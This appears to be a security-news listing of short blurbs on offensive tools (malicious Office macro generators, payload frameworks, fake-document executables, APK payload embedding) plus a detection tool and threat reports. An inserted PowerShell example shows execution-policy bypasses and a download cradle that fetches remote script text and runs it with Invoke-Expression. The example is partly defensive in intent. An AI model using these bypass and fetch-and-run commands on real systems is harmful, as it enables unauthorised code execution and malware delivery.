PowerShell Injection with Diskless Payload Persistence and Bypass Techniques

PowerShell continues to be the tool of choice for defenders, IT administrators, and attackers alike. Its extensibility, vendor support, and the availability of a full-fledged programming language at your fingertips provide a level of control over Microsoft's operating system that was sorely missing in the past. We are huge advocates of PowerShell at Binary Defense, and it […]

Generate-Macro – PowerShell Script To Generate a Malicious Microsoft Office Document with a Specified Payload and Persistence Method

Credits: Matt Nelson (@enigma0x3) DOWNLOAD GENERATE-MACRO https://github.com/enigma0x3/Generate-Macro This PowerShell script will generate a malicious Microsoft Office document with a specified payload and persistence method. SYNOPSIS Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. [!] This script […]

Meterpreter Payload Detection – Tool for Detecting Meterpreter in Memory, Usable as an IPS/IDS and Forensics Tool

Meterpreter_Payload_Detection.exe is a tool for detecting Meterpreter in memory, usable as an IPS/IDS and forensics tool. DOWNLOAD Meterpreter_Payload_Detection https://github.com/DamonMohammadbagher/Meterpreter_Payload_Detection CREDITS: DamonMohammadbagher Install Notes: Download Meterpreter_Payload_Detection. Compile the C# code or unzip release_v1.0.0.4. Run Meterpreter_Payload_Detection.exe. If you liked this software, please consider leaving a star and forking the repository on GitHub. C# code author: Damon Mohammadbagher. Meterpreter signature authors: Rohan […]

Insanity-Framework – a Tool To Generate Payloads and Control Remote Machines

Insanity-Framework generates payloads and controls remote machines. Insanity-Framework ** VERSION 1.6 RELEASED !!! ** * Copyright 2017 Insanity Framework (IF) Written by: * Alisson Moretto – 4w4k3 Special Thanks to Thomas Perkins – Ekultek The Insanity payload works by encrypting your code and decrypting it in memory, thus avoiding a possible AV signature; it also has […]

Embedding a Metasploit Payload in an Original Android APK

Embed a Metasploit payload in an original Android APK. Welcome back. In the last part of the Android Hacking Series we discussed how to create a malicious payload to hack Android phones. Today you will learn how to make your malicious Android APK more convincing by injecting a hook for our payload into an original […]

Insanity Framework – Generate Payloads and Control Remote Machines

As persuasion techniques have proven effective in pentests, several painstaking ways of building a payload have emerged; Insanity Framework provides speed and effectiveness in a single tool. Note: Insanity payloads can take up to 1 minute to connect back; this delay is deliberate, to evade more AVs and sandboxes. DISCLAIMER: "DISCLAIMED. IN NO EVENT SHALL THE […]

backdoorppt – Transform Your payload.exe into a Fake Word Doc

A simple script that allows users to add an MS Word icon to an existing executable (.exe), using Resource Hacker as the backend application, plus a Ruby one-liner that hides the .exe extension and appends the Word document extension (.ppt, as the tool labels it) to the end of the file name. Version release: v1.5-Stable Distros supported: Kali Linux, Ubuntu, Mint Author: pedro […]

Pentesting Windows Environments: Remote Delivery of PowerShell Payloads

PowerShell is an amazing post-exploitation tool available to the attacker during engagements in Windows environments. Tools like PowerSploit or PowerShell Empire help a lot during internal tests. The problem is that a restrictive execution policy is enabled by default on Windows machines, which makes it awkward to run .ps1 scripts. Not having admin rights on the target […]
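The execution-policy obstacle mentioned above is weaker than it looks: the policy only governs how .ps1 files on disk are loaded, and it can be overridden per process or sidestepped entirely without administrative rights. The following is an added illustration written for this listing, not code from the linked article or from PowerSploit/Empire; the script path and the download URL are placeholders.

```powershell
# Added example: why a "Restricted" execution policy does not stop a non-admin user
# from running PowerShell code. Every command here is standard PowerShell; the
# script name and URL are hypothetical placeholders.

# 1. See the effective policy at each scope (MachinePolicy and UserPolicy come
#    from Group Policy; LocalMachine/CurrentUser from the registry; Process is
#    in-memory only).
Get-ExecutionPolicy -List

# 2. Relax the policy for the current process only. No admin rights are needed and
#    nothing on disk changes, so the setting disappears when the process exits.
#    This fails only if a Group Policy (MachinePolicy/UserPolicy) pins the value.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force

# 3. Equivalent for a fresh child process: the command-line switch overrides the
#    registry-level policy for that process.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\script.ps1   # placeholder script

# 4. The policy applies to script *files*. Feeding the text to the engine on stdin
#    or as a -Command string is not subject to it at all.
Get-Content .\script.ps1 -Raw | powershell.exe -NoProfile -Command -

# 5. Remote delivery: nothing touches disk. The payload is fetched as a string and
#    evaluated in memory (the "download cradle" pattern the article is about).
$code = (New-Object System.Net.WebClient).DownloadString('http://10.0.0.5/script.ps1')  # placeholder URL
Invoke-Expression $code
```

Microsoft's own documentation describes the execution policy as a safety feature to prevent accidental script execution, not a security boundary; the controls that actually constrain an unprivileged user are Group Policy-enforced policy, application allow-listing, and script block logging for detection.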

PNG Embedded – Malicious payload hidden in a PNG file

One of the most complex tasks for cybercriminals is to ensure their malicious code goes undetected by antivirus and achieves its goal. To that end, they have invested a lot in more complex infection processes, going beyond traditional phishing and using techniques where the malicious payload is hidden in encrypted files – even using […]

Chinese Group 'admin@338' Uses Dropbox To Deliver Its Payload

FireEye Threat Intelligence analysts have discovered a new phishing campaign carried out by a Chinese group using a legitimate service, Dropbox. Analysts found the group (unnamed at the moment, though some researchers refer to it as "admin@338") sending emails with links to Dropbox-hosted documents. The documents in reality carried a malware payload known […]